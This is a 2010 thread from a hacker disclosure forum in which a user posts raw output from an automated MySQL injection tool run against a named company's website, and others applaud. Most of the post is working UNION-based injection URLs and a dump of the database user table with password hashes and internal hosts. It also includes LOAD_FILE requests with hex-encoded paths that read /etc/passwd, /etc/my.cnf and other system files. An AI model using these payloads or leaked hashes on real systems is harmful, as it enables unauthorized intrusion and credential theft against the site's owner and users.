Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
dragonsoft "security site"
Posted by: VMw4r3
Date: May 06, 2010 04:26PM

dragonsoft.com, either a honeypot or a really bad waf site.


[+] URL: http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,darkc0de,3,4,5,6
[+] 15:19:04
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@www-local.dragonsoft.com
Version: 5.1.30-log

[+] Do we have Access to MySQL Database: YES <-- w00t w00t

[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 14
[0] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:localhost
[1] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:test.dragonsoft
[2] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:127.0.0.1
[3] localhost:N:U
[4] test.dragonsoft:N:U
[5] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:localhost
[6] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:localhost
[7] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:localhost
[8] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.3
[9] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.4
[10] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.5
[11] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.6
[12] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:%
[13] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:192.168.2.%

[+] Do we have Access to Load_File: YES <-- w00t w00t
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,darkc0de,3,4,5,6
[+] 15:24:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@www-local.dragonsoft.com
Version: 5.1.30-log

[+] Do we have Access to MySQL Database: YES <-- w00t w00t

[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 14
[0] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:localhost
[1] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:test.dragonsoft
[2] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:127.0.0.1
[3] localhost:N:U
[4] test.dragonsoft:N:U
[5] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:localhost
[6] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:localhost
[7] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:localhost
[8] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.3
[9] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.4
[10] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.5
[11] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.6
[12] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:%
[13] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:192.168.2.%

[+] Do we have Access to Load_File: YES <-- w00t w00t

[+] Starting Load_File Fuzzer...
[+] Number of tables names to be fuzzed: 236

[!] Found /etc/passwd
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6--
[!] Found /etc/hosts
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6--
[!] Found /etc/motd
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6--
[!] Found /etc/fstab
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6673746162),3,4,5,6--
[!] Found /etc/my.cnf
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6d792e636e66),3,4,5,6--
[!] Found /etc/group
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f67726f7570),3,4,5,6--

Options: ReplyQuote
Re: dragonsoft "security site"
Posted by: Skyphire
Date: May 07, 2010 06:53PM

haha awesome work.

Options: ReplyQuote
Re: dragonsoft "security site"
Posted by: Skyphire
Date: May 07, 2010 06:54PM

They got cool animated gifs though.


Options: ReplyQuote
Re: dragonsoft "security site"
Posted by: skpx_
Date: May 08, 2010 10:54AM

VMw4r3 long time no see :p

Options: ReplyQuote


Sorry, only registered users may post in this forum.